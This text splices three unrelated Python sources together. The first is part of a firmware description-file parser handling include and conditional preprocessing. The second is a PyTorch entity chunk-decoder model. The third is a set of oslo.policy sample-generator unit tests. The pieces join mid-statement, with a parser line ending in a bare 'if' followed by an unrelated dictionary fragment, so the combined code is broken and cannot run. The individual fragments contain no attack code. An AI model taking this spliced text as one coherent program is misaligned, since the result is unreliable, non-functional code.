self.CurrentLineNumber) IncFileProfile = IncludeFileProfile(IncludedFile1.Path) CurrentLine = self.CurrentLineNumber CurrentOffset = self.CurrentOffsetWithinLine # list index of the insertion, note that line number is 'CurrentLine + 1' InsertAtLine = CurrentLine ParentProfile = GetParentAtLine (CurrentLine) if ParentProfile is not None: ParentProfile.IncludeFileList.insert(0, IncFileProfile) IncFileProfile.Level = ParentProfile.Level + 1 IncFileProfile.InsertStartLineNumber = InsertAtLine + 1 # deal with remaining portions after "!include filename", if exists. if self._GetNextToken(): if self.CurrentLineNumber == CurrentLine: RemainingLine = self._CurrentLine()[CurrentOffset:] self.Profile.FileLinesList.insert(self.CurrentLineNumber, RemainingLine) IncFileProfile.InsertAdjust += 1 self.CurrentLineNumber += 1 self.CurrentOffsetWithinLine = 0 for Line in IncFileProfile.FileLinesList: self.Profile.FileLinesList.insert(InsertAtLine, Line) self.CurrentLineNumber += 1 InsertAtLine += 1 # reversely sorted to better determine error in file AllIncludeFileList.insert(0, IncFileProfile) # comment out the processed include file statement TempList = list(self.Profile.FileLinesList[IncludeLine - 1]) TempList.insert(IncludeOffset, TAB_COMMENT_SPLIT) self.Profile.FileLinesList[IncludeLine - 1] = ''.join(TempList) if Processed: # Nested and back-to-back support self.Rewind(DestLine = IncFileProfile.InsertStartLineNumber - 1) Processed = False # Preprocess done. self.Rewind() @staticmethod def _GetIfListCurrentItemStat(IfList): if len(IfList) == 0: return True for Item in IfList: if Item[1] == False: return False return True ## PreprocessConditionalStatement() method # # Preprocess conditional statement. # In the end, rewind the file buffer pointer to the beginning # # @param self The object pointer # def PreprocessConditionalStatement(self): # IfList is a stack of if branches with elements of list [Pos, CondSatisfied, BranchDetermined] IfList = [] RegionLayoutLine = 0 ReplacedLine = -1 while self._GetNextToken(): # Determine section name and the location dependent macro if self._GetIfListCurrentItemStat(IfList): if self._Token.startswith(TAB_SECTION_START): Header = self._Token if not self._Token.endswith(TAB_SECTION_END): self._SkipToToken(TAB_SECTION_END) Header += self._SkippedChars if Header.find('$(') != -1: raise Warning("macro cannot be used in section header", self.FileName, self.CurrentLineNumber) self._SectionHeaderParser(Header) continue # Replace macros except in RULE section or out of section elif self._CurSection and ReplacedLine != self.CurrentLineNumber: ReplacedLine = self.CurrentLineNumber self._UndoToken() CurLine = self.Profile.FileLinesList[ReplacedLine - 1] PreIndex = 0 StartPos = CurLine.find('$(', PreIndex) EndPos = CurLine.find(')', StartPos+2) while StartPos != -1 and EndPos != -1 and self._Token not in {TAB_IF_DEF, TAB_IF_N_DEF, TAB_IF, TAB_ELSE_IF}: MacroName = CurLine[StartPos+2: EndPos] MacorValue = self._GetMacroValue(MacroName) if
self.span_embedding.output_size, "position_embedding": position_embedding, "allowed_a2h_relations": allowed_a2h_relations, "allowed_a2a2h_relations": allowed_a2a2h_relations, "constrained_outputs": constrained_outputs, **chunk_decoder, }}) multilabels = {} ner_label_to_multilabels = [None] * len(ner_labels) for ner_label, ner_multilabels in normalizer_scheme.items(): indices = [multilabels.setdefault(multilabel, len(multilabels)) for multilabel in ner_multilabels] ner_label_to_multilabels[ner_labels.index(ner_label)] = indices ner_label_to_multilabels = torch.as_tensor([ [True if idx in multilabel_indices else False for idx in range(len(multilabels))] for multilabel_indices in ner_label_to_multilabels ]).bool() multilabels = torch.as_tensor([ [label in multilabel for label in entity_labels] for multilabel in multilabels ]).bool() self.normalizer = Normalizer( input_size=self.span_embedding.output_size, multilabels=multilabels, ner_label_to_multilabels=ner_label_to_multilabels, **normalizer, ) def fast_params(self): return [ *self.chunk_decoder.fast_params(), *self.span_scorer.fast_params(), ] def on_training_step(self, current, total): self.chunk_decoder.on_training_step(current, total) def forward(self, words_embed, batch=None, return_loss=False, return_predictions=False): loss_dict = {} if return_loss is True: supervision = {*self.base_supervision, "span", "chunk_relation", "normalizer", "chunk_label", "reg", "coref"} # , "c2c", "label", "reg") elif return_loss is False: supervision = set(self.base_supervision) else: supervision = set(return_loss) if isinstance(words_embed, tuple): words_embed, lm_embeds = words_embed words_mask = batch['words_mask'] original_words_embed = words_embed if self.contextualizer is not None: words_embed = self.contextualizer(original_words_embed, words_mask) ############################ # Generate spans # ############################ spans = self.span_scorer(words_embed, words_mask, {**batch, "fragments_label": batch.get("fragments_ner_label", None)}, force_gold=bool({"local", "span", "label", "normalizer"} & supervision)) spans_mask, spans_begin, spans_end, spans_ner_label, spans_chunks, chunks_spans = ( spans["flat_spans_mask"], spans["flat_spans_begin"], spans["flat_spans_end"], spans["flat_spans_label"], batch["fragments_chunks"], batch["chunks_fragments"]) normalizer_result = self.normalizer(words_embed, spans_begin, spans_end, spans_ner_label, spans_mask, batch=batch, return_loss=bool({"local", "normalizer", "label"} & supervision)) spans_label = normalizer_result["prediction"] ################################## # Transform spans with attention # ################################## spans_embed = self.span_embedding(words_embed, spans_begin, spans_end, spans_label) ####################################### # Decode chunks (local scope cliques) # ####################################### chunks = self.chunk_decoder( words_embed=words_embed, words_mask=words_mask, spans_embed=spans_embed, spans_begin=spans_begin, spans_end=spans_end, spans_label=spans_label, spans_mask=spans_mask, batch=batch, supervision=supervision, ) ##################### # Sum up the losses # ##################### ##################### if "span" in supervision: span_loss_dict = self.span_scorer.loss(spans, {**batch, "fragments_label": batch.get("fragments_ner_label", None)}) del span_loss_dict["loss"] loss_dict.update(span_loss_dict) if "normalizer" in supervision: loss_dict["normalizer_loss"] = normalizer_result["loss"] if "chunk_relation" in supervision: loss_dict["chunk_relation_loss"] = chunks["chunk_relation_loss"] loss_dict["scope_tag_loss"] = chunks["scope_tag_loss"] # loss_dict["biaffine_relation_loss"] = chunks["biaffine_relation_loss"] if "chunk_label" in supervision: loss_dict["chunk_label_loss"] = chunks["chunk_label_loss"] loss = sum(sub_loss for sub_loss in loss_dict.values()) predictions = None if return_predictions: predictions = [{"fragments": [], "entities": []} for sample in batch["original_sample"]] entities_fragments = chunks["chunks_spans"] entities_mask = (entities_fragments != -1).any(-1) entities_label = chunks["chunks_labels"] if 0 not in entities_fragments.shape: for sample_idx, entity_idx in entities_mask.nonzero(as_tuple=False).tolist(): chunk_labels = entities_label[sample_idx, entity_idx].nonzero(as_tuple=True)[0].tolist() predictions[sample_idx]["entities"].append({ "entity_id": len(predictions[sample_idx]), "confidence": 1., # entities_confidence[sample_idx, entity_idx].item(), "chunks": [{ "chunk_id": len(predictions[sample_idx]), "confidence": 1., # entities_confidence[sample_idx, entity_idx].item(), "label": chunk_labels, "fragments": [ { "fragment_id": fragment_idx, "begin": spans_begin[sample_idx, fragment_idx].item(), "end": spans_end[sample_idx, fragment_idx].item(), "label": label, } for fragment_idx in entities_fragments[sample_idx, entity_idx].tolist() if fragment_idx >= 0 for label in spans_label[sample_idx, fragment_idx].nonzero(as_tuple=True)[0].tolist() if label in chunk_labels ] }] }) if 0 not in spans_mask.shape: # entities_confidence = entities_label_scores.detach().cpu()[-1].sigmoid().masked_fill(~entities_label, 1).prod(-1) # for sample_idx, entity_idx in (~entities_label[..., 0]).masked_fill(~entities_mask.cpu(), False).nonzero(as_tuple=False).tolist(): for sample_idx, fragment_idx in spans_mask.nonzero(as_tuple=False).tolist(): for label in spans_label[sample_idx, fragment_idx].nonzero(as_tuple=True)[0].tolist(): predictions[sample_idx]["fragments"].append({ "fragment_id": fragment_idx, "confidence": 1., # entities_confidence[sample_idx, entity_idx].item(), "begin": spans_begin[sample_idx, fragment_idx].item(), "end": spans_end[sample_idx, fragment_idx].item(), "label": label, }) return { "predictions": predictions, **loss_dict, "holes_delta_loss": chunks["holes_delta"].detach() if "holes_delta" in chunks else 0, "loss": loss, "spans": spans, "chunks": chunks, "words_embed": words_embed, "spans_embed": spans_embed, "normalized": normalizer_result, } @register("chunk_decoder", do_not_serialize=( "position_embedding", "allowed_a2h_relations", "allowed_a2a2h_relations", "constrained_outputs", )) class ChunkDecoder(torch.nn.Module): ENSEMBLE = "ensemble_chunk_decoder" def __init__(self, input_size, scope_head_size=64, position_embedding=None, allowed_a2h_relations=None, allowed_a2a2h_relations=None, constrained_outputs=None, do_target_links_count=True, scope_match_temperature=1., chunk_relation_loss_weight=1, scope_tag_loss_weight=1, label_loss_weight=0.5, do_biaffine=True, do_scopes=True, do_constraints="always", biaffine_scale=0.2, dropout_p=0.2, biaffine_mode="and", label_proj_pooling="max", attention_mode=('c2c', 'c2p', 'p2c'), scope_crf_params={}, symmetric_training=False, scope_supervision="word", do_scope_holes=True, ): super().__init__() if do_constraints is True: do_constraints = "always" assert do_constraints in ("always", False, "test-only") self.do_constraints = do_constraints self.register_buffer("allowed_a2h_relations", allowed_a2h_relations) self.register_buffer("allowed_a2a2h_relations", allowed_a2a2h_relations) self.register_buffer("constrained_outputs", constrained_outputs.float()) self.label_proj = torch.nn.Linear(input_size, constrained_outputs.shape[1]) self.label_proj.bias = None self.do_target_links_count = do_target_links_count self.scope_match_temperature = scope_match_temperature self.chunk_relation_loss = RelationLoss(symmetric=False, weight=chunk_relation_loss_weight) self.scope_tag_loss_weight = scope_tag_loss_weight self.label_loss_weight = label_loss_weight self.dropout = torch.nn.Dropout(dropout_p) self.symmetric_training = symmetric_training self.do_scopes = do_scopes self.label_proj_pooling = label_proj_pooling if label_proj_pooling == "embed-max": self.pre_label_proj = torch.nn.Linear(input_size, input_size) self.do_scope_holes = do_scopes and do_scope_holes self.scope_supervision = scope_supervision if do_scopes else False self.scope_tag_loss_weight = scope_tag_loss_weight if scope_supervision == "word" else 0. if self.do_scopes: if self.do_scope_holes: self.register_buffer('bounds_to_tags', torch.tensor([ # [0, 1, 1, 1, 1], [0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1], ], dtype=torch.float)) else: self.register_buffer('bounds_to_tags', torch.tensor([ # [0, 1, 1, 1, 1], [0, 0, 1, 0, 1], [0, 0, 0, 1, 1], ], dtype=torch.float)) self.scope_bias = torch.nn.Parameter(torch.zeros(self.bounds_to_tags.shape[1], dtype=torch.float)) self.scope_proj = RelativeAttention( size=input_size, n_heads=self.bounds_to_tags.shape[1], do_pooling=False, head_size=scope_head_size, pos_size=position_embedding.shape[-1] if position_embedding is not None else None, position_embedding=position_embedding, dropout_p=dropout_p, mode=attention_mode, head_bias=True, ) self.scope_pooler = Pooler(mode="mean") self.scope_decoder = ScopeCRF(**{**scope_crf_params, "do_holes": do_scope_holes}) assert biaffine_mode in ("and", "sum", "min") self.do_biaffine = do_biaffine self.biaffine_mode = biaffine_mode self.biaffine_scale = biaffine_scale # torch.nn.Parameter(torch.tensor(0.2)) if self.do_biaffine: self.biaffine_proj = RelativeAttention( size=input_size, n_heads=1, do_pooling=False, head_size=input_size, pos_size=position_embedding.shape[-1] if position_embedding is not None else None, position_embedding=position_embedding, head_bias=True, dropout_p=dropout_p, mode=attention_mode, ) self.progress = 0. def on_training_step(self, step_idx, total_steps): self.progress = 2. * float(step_idx) / total_steps def fast_params(self): return [self.scope_bias] if hasattr(self, 'scope_bias') else [] # *self.scope_decoder.parameters(), self.scope_bias, *self.label_proj.parameters()] def forward(self, words_embed, words_mask, spans_embed, spans_begin, spans_end, spans_label, spans_mask, batch=None, supervision=set()): device = words_embed.device sample_index = torch.arange(len(words_embed), device=device)[:, None] n_spans = spans_mask.shape[-1] res_dict = {} if (self.do_constraints == "test-only" and not self.training) or self.do_constraints == "always": allowed_a2h_relations = self.allowed_a2h_relations allowed_a2a2h_relations = self.allowed_a2a2h_relations else: allowed_a2h_relations = self.allowed_a2h_relations | self.allowed_a2h_relations.any(0) allowed_a2a2h_relations = self.allowed_a2a2h_relations | self.allowed_a2a2h_relations.any(0).any(0) ######################################### # CHUNK DECODING # ######################################### scope_logits = scope_tags_logprobs = scope_bounds_emissions = scope_emissions = scope_tags_logits = None spans_positions = (torch.stack([spans_begin], dim=-1), torch.stack([spans_end], dim=-1)) words_positions = (torch.stack([torch.arange(words_embed.shape[1], device=words_embed.device).view(1, -1).repeat_interleave(len(words_embed), dim=0)], dim=-1),) * 2 if self.do_scopes: # begin and end coordinates of each element (span or word) x = words_positions[0][:, None, :] - spans_positions[1][:, :, None] # span end -> word y = words_positions[1][:, None, :] - spans_positions[0][:, :, None] # span begin -> word spans_words_distance = torch.where( (x.sign() > 0) & (y.sign() > 0), torch.minimum(x, y), torch.where((x.sign() < 0) & (y.sign() < 0), torch.maximum(x, y), 0) ) span_word_attn = self.scope_proj( content_queries=spans_embed, content_keys=words_embed, mask=words_mask, relative_positions=spans_words_distance, ) scope_bounds_emissions = torch.cat([ *[span_word_attn[..., :2].masked_fill( torch.stack([ y.squeeze(-1) > 0, # start tag cannot be after span begin x.squeeze(-1) < 0, # stop tag cannot be before span end ], dim=-1), IMPOSSIBLE)], *([span_word_attn[..., 2:4]] if self.do_scope_holes else []), ], dim=-1) if not self.training else span_word_attn[..., :(4 if self.do_scope_holes else 2)] scope_emissions = scope_bounds_emissions[spans_mask] @ self.bounds_to_tags + self.scope_bias scope_mask = words_mask.unsqueeze(1).expand(*spans_mask.shape, -1)[spans_mask] scope_tags_logits = torch.zeros(span_word_attn.shape[:-1], device=scope_emissions.device, dtype=torch.float) scope_tags_logprobs = self.scope_decoder.marginal(scope_emissions, scope_mask) scope_tags_logits[spans_mask] = ( scope_tags_logprobs[..., [1, 2, 3, 4]].logsumexp(-1) - (scope_tags_logprobs[..., [0, 5, 6, 7, 8]].logsumexp(-1) if self.do_scope_holes else scope_tags_logprobs[..., 0]) ) scope_logits = self.scope_pooler( scope_tags_logits.unsqueeze(-1), (spans_begin.unsqueeze(1), spans_end.unsqueeze(1) + 1), )[..., 0] if self.do_biaffine: x = spans_positions[0][:, None, :] - spans_positions[1][:, :, None] y = spans_positions[1][:, None, :] - spans_positions[0][:, :, None] span_span_distance = torch.where( (x.sign() > 0) & (y.sign() > 0), torch.minimum(x, y), torch.where((x.sign() < 0) & (y.sign() < 0), torch.maximum(x, y), 0) ) biaffine_logits = self.biaffine_proj( content_queries=spans_embed, content_keys=spans_embed, mask=spans_mask, relative_positions=span_span_distance, )[..., 0] if self.do_biaffine and self.do_scopes: if self.biaffine_mode == "and": combined_logits = log_and(scope_logits, biaffine_logits) elif self.biaffine_mode == "min": combined_logits = torch.min(scope_logits, biaffine_logits) elif self.do_scopes: combined_logits = scope_logits elif self.do_biaffine: combined_logits = biaffine_logits if supervision: spans_chunks = batch["fragments_chunks"] chunks_spans = batch["chunks_fragments"] same_entity_target = None if "chunk_relation" in supervision: same_entity_target = ( (spans_chunks.unsqueeze(1).unsqueeze(-1) == spans_chunks.unsqueeze(2).unsqueeze(-2)) & (spans_chunks.unsqueeze(1).unsqueeze(-1) != -1) & (spans_chunks.unsqueeze(2).unsqueeze(-2) != -1) ).any(-1).any(-1) relation_mask = spans_mask[:, :, None] & spans_mask[:, None, :] has_overlap = (spans_begin.unsqueeze(-1) <= spans_end.unsqueeze(-2)) & (spans_end.unsqueeze(-1) >= spans_begin.unsqueeze(-2)) matching_logits = combined_logits.detach().masked_fill(~spans_mask.unsqueeze(-1), IMPOSSIBLE) ################################## # Fragment -> fragment relations # ################################## mydebug = None has_more_target_links = begin_targets = end_targets = hole_targets = pos_targets = scope_target = number_of_holes = None if "chunk_relation" in supervision: scope_loss_mask = (batch["has_chunks"][..., None] & spans_mask)[spans_mask] # allowed_a2h_relations: n_labels * n_labels # OLD # a2h_constraints = gather(allowed_a2h_relations[spans_label], index=spans_label.unsqueeze(1), dim=2) & relation_mask # NEW # spans_label: batch_size * n_spans * n_labels (bux) (bvy) # -> a2h_constraints: batch_size * n_spans * n_spans (xy) a2h_constraints = (torch.einsum( 'buy,bvy->buv', (torch.einsum('bux,xy->buy', spans_label.float(), allowed_a2a2h_relations.any(-1).float()) != spans_label.float().sum(-1, keepdim=True)).float(), spans_label.float().float() ) == 0.) & relation_mask & (spans_label & allowed_a2a2h_relations.any(0).any(0)).any(-1)[:, None, :] symmetric_a2h_target = same_entity_target & (a2h_constraints | a2h_constraints.transpose(-1, -2)) # two attributes can only be linked (and their relation penalized) if one is attached to a head that the other could be linked to a2a_constraints = torch.einsum( 'nih,njh->nij', symmetric_a2h_target.float(), a2h_constraints.float() ).bool() & relation_mask & symmetric_a2h_target.any(-1).unsqueeze(-2)
<reponame>openstack/oslo.policy # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import operator from unittest import mock import warnings from oslo_config import cfg import stevedore import testtools import yaml from oslo_policy import generator from oslo_policy import policy from oslo_policy.tests import base from oslo_serialization import jsonutils OPTS = {'base_rules': [policy.RuleDefault('admin', 'is_admin:True', description='Basic admin check'), policy.DocumentedRuleDefault('owner', ('project_id:%' '(project_id)s'), 'This is a long ' 'description to check ' 'that line wrapping ' 'functions properly', [{'path': '/foo/', 'method': 'GET'}, {'path': '/test/', 'method': 'POST'}])], 'custom_field': [policy.RuleDefault('shared', 'field:networks:shared=True')], 'rules': [policy.RuleDefault('admin_or_owner', 'rule:admin or rule:owner')], } class GenerateSampleYAMLTestCase(base.PolicyBaseTestCase): def setUp(self): super(GenerateSampleYAMLTestCase, self).setUp() self.enforcer = policy.Enforcer(self.conf, policy_file='policy.yaml') def test_generate_loadable_yaml(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) output_file = self.get_config_file_fullname('policy.yaml') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: # generate sample-policy file with only rules generator._generate_sample(['base_rules', 'rules'], output_file, include_help=False) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['base_rules', 'rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) self.enforcer.load_rules() self.assertIn('owner', self.enforcer.rules) self.assertIn('admin', self.enforcer.rules) self.assertIn('admin_or_owner', self.enforcer.rules) self.assertEqual('project_id:%(project_id)s', str(self.enforcer.rules['owner'])) self.assertEqual('is_admin:True', str(self.enforcer.rules['admin'])) self.assertEqual('(rule:admin or rule:owner)', str(self.enforcer.rules['admin_or_owner'])) def test_expected_content(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) expected = '''# Basic admin check #"admin": "is_admin:True" # This is a long description to check that line wrapping functions # properly # GET /foo/ # POST /test/ #"owner": "project_id:%(project_id)s" #"shared": "field:networks:shared=True" #"admin_or_owner": "rule:admin or rule:owner" ''' output_file = self.get_config_file_fullname('policy.yaml') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['base_rules', 'rules'], output_file) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['base_rules', 'rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) with open(output_file, 'r') as written_file: written_policy = written_file.read() self.assertEqual(expected, written_policy) def test_expected_content_stdout(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) expected = '''# Basic admin check #"admin": "is_admin:True" # This is a long description to check that line wrapping functions # properly # GET /foo/ # POST /test/ #"owner": "project_id:%(project_id)s" #"shared": "field:networks:shared=True" #"admin_or_owner": "rule:admin or rule:owner" ''' stdout = self._capture_stdout() with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['base_rules', 'rules'], output_file=None) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['base_rules', 'rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) self.assertEqual(expected, stdout.getvalue()) def test_policies_deprecated_for_removal(self): rule = policy.RuleDefault( name='foo:post_bar', check_str='role:fizz', description='Create a bar.', deprecated_for_removal=True, deprecated_reason='This policy is not used anymore', deprecated_since='N' ) opts = {'rules': [rule]} extensions = [] for name, opts, in opts.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['rules'] ) expected = '''# DEPRECATED # "foo:post_bar" has been deprecated since N. # This policy is not used anymore # Create a bar. #"foo:post_bar": "role:fizz" ''' stdout = self._capture_stdout() with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['rules'], output_file=None) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True ) self.assertEqual(expected, stdout.getvalue()) def test_deprecated_policies_are_aliased_to_new_names(self): deprecated_rule = policy.DeprecatedRule( name='foo:post_bar', check_str='role:fizz', deprecated_reason=( 'foo:post_bar is being removed in favor of foo:create_bar' ), deprecated_since='N', ) new_rule = policy.RuleDefault( name='foo:create_bar', check_str='role:fizz', description='Create a bar.', deprecated_rule=deprecated_rule, ) opts = {'rules': [new_rule]} extensions = [] for name, opts in opts.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['rules']) expected = '''# Create a bar. #"foo:create_bar": "role:fizz" # DEPRECATED # "foo:post_bar":"role:fizz" has been deprecated since N in favor of # "foo:create_bar":"role:fizz". # foo:post_bar is being removed in favor of foo:create_bar "foo:post_bar": "rule:foo:create_bar" ''' stdout = self._capture_stdout() with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['rules'], output_file=None) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True ) self.assertEqual(expected, stdout.getvalue()) def test_deprecated_policies_with_same_name(self): deprecated_rule = policy.DeprecatedRule( name='foo:create_bar', check_str='role:old', deprecated_reason=( 'role:fizz is a more sane default for foo:create_bar' ), deprecated_since='N', ) new_rule = policy.RuleDefault( name='foo:create_bar', check_str='role:fizz', description='Create a bar.', deprecated_rule=deprecated_rule, ) opts = {'rules': [new_rule]} extensions = [] for name, opts in opts.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['rules']) expected = '''# Create a bar. #"foo:create_bar": "role:fizz" # DEPRECATED # "foo:create_bar":"role:old" has been deprecated since N in favor of # "foo:create_bar":"role:fizz". # role:fizz is a more sane default for foo:create_bar ''' stdout = self._capture_stdout() with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['rules'], output_file=None) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True ) self.assertEqual(expected, stdout.getvalue()) def _test_formatting(self, description, expected): rule = [policy.RuleDefault('admin', 'is_admin:True', description=description)] ext = stevedore.extension.Extension(name='check_rule', entry_point=None, plugin=None, obj=rule) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=[ext], namespace=['check_rule']) output_file = self.get_config_file_fullname('policy.yaml') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['check_rule'], output_file) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['check_rule'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) with open(output_file, 'r') as written_file: written_policy = written_file.read() self.assertEqual(expected, written_policy) def test_empty_line_formatting(self): description = ('Check Summary \n' '\n' 'This is a description to ' 'check that empty line has ' 'no white spaces.') expected = """# Check Summary # # This is a description to check that empty line has no white spaces. #"admin": "is_admin:True" """ self._test_formatting(description, expected) def test_paragraph_formatting(self): description = """ Here's a neat description with a paragraph. We want to make sure that it wraps properly. """ expected = """# Here's a neat description with a paragraph. We want \ to make sure # that it wraps properly. #"admin": "is_admin:True" """ self._test_formatting(description, expected) def test_literal_block_formatting(self): description = """Here's another description. This one has a literal block. These lines should be kept apart. They should not be wrapped, even though they may be longer than 70 chars """ expected = """# Here's another description. # # This one has a literal block. # These lines should be kept apart. # They should not be wrapped, even though they may be longer than 70 chars #"admin": "is_admin:True" """ self._test_formatting(description, expected) def test_invalid_formatting(self): description = """Here's a broken description. We have some text... Followed by a literal block without any spaces. We don't support definition lists, so this is just wrong! """ expected = """# Here's a broken description. # # We have some text... # # Followed by a literal block without any spaces. # We don't support definition lists, so this is just wrong! #"admin": "is_admin:True" """ with warnings.catch_warnings(record=True) as warns: self._test_formatting(description, expected) self.assertEqual(1, len(warns)) self.assertTrue(issubclass(warns[-1].category, FutureWarning)) self.assertIn('Invalid policy description', str(warns[-1].message)) class GenerateSampleJSONTestCase(base.PolicyBaseTestCase): def setUp(self): super(GenerateSampleJSONTestCase, self).setUp() self.enforcer = policy.Enforcer(self.conf, policy_file='policy.json') def test_generate_loadable_json(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) output_file = self.get_config_file_fullname('policy.json') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: # generate sample-policy file with only rules generator._generate_sample(['base_rules', 'rules'], output_file, output_format='json', include_help=False) mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['base_rules', 'rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) self.enforcer.load_rules() self.assertIn('owner', self.enforcer.rules) self.assertIn('admin', self.enforcer.rules) self.assertIn('admin_or_owner', self.enforcer.rules) self.assertEqual('project_id:%(project_id)s', str(self.enforcer.rules['owner'])) self.assertEqual('is_admin:True', str(self.enforcer.rules['admin'])) self.assertEqual('(rule:admin or rule:owner)', str(self.enforcer.rules['admin_or_owner'])) def test_expected_content(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) expected = '''{ "admin": "is_admin:True", "owner": "project_id:%(project_id)s", "shared": "field:networks:shared=True", "admin_or_owner": "rule:admin or rule:owner" } ''' output_file = self.get_config_file_fullname('policy.json') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['base_rules', 'rules'], output_file=output_file, output_format='json') mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['base_rules', 'rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) with open(output_file, 'r') as written_file: written_policy = written_file.read() self.assertEqual(expected, written_policy) def test_expected_content_stdout(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) expected = '''{ "admin": "is_admin:True", "owner": "project_id:%(project_id)s", "shared": "field:networks:shared=True", "admin_or_owner": "rule:admin or rule:owner" } ''' stdout = self._capture_stdout() with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr) as mock_ext_mgr: generator._generate_sample(['base_rules', 'rules'], output_file=None, output_format='json') mock_ext_mgr.assert_called_once_with( 'oslo.policy.policies', names=['base_rules', 'rules'], on_load_failure_callback=generator.on_load_failure_callback, invoke_on_load=True) self.assertEqual(expected, stdout.getvalue()) @mock.patch.object(generator, 'LOG') def test_generate_json_file_log_warning(self, mock_log): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, entry_point=None, plugin=None, obj=opts) extensions.append(ext) test_mgr = stevedore.named.NamedExtensionManager.make_test_instance( extensions=extensions, namespace=['base_rules', 'rules']) output_file = self.get_config_file_fullname('policy.json') with mock.patch('stevedore.named.NamedExtensionManager', return_value=test_mgr): generator._generate_sample(['base_rules', 'rules'], output_file, output_format='json') mock_log.warning.assert_any_call(policy.WARN_JSON) class GeneratorRaiseErrorTestCase(testtools.TestCase): def test_generator_raises_error(self): """Verifies that errors from extension manager are not suppressed.""" class FakeException(Exception): pass class FakeEP(object): def __init__(self): self.name = 'callback_is_expected' self.require = self.resolve self.load = self.resolve def resolve(self, *args, **kwargs): raise FakeException() fake_ep = FakeEP() with mock.patch('stevedore.named.NamedExtensionManager', side_effect=FakeException()): self.assertRaises(FakeException, generator._generate_sample, fake_ep.name) def test_generator_call_with_no_arguments_raises_error(self): testargs = ['oslopolicy-sample-generator'] with mock.patch('sys.argv', testargs): local_conf = cfg.ConfigOpts() self.assertRaises(cfg.RequiredOptError, generator.generate_sample, [], local_conf) class GeneratePolicyTestCase(base.PolicyBaseTestCase): def setUp(self): super(GeneratePolicyTestCase, self).setUp() def test_merged_rules(self): extensions = [] for name, opts in OPTS.items(): ext = stevedore.extension.Extension(name=name, 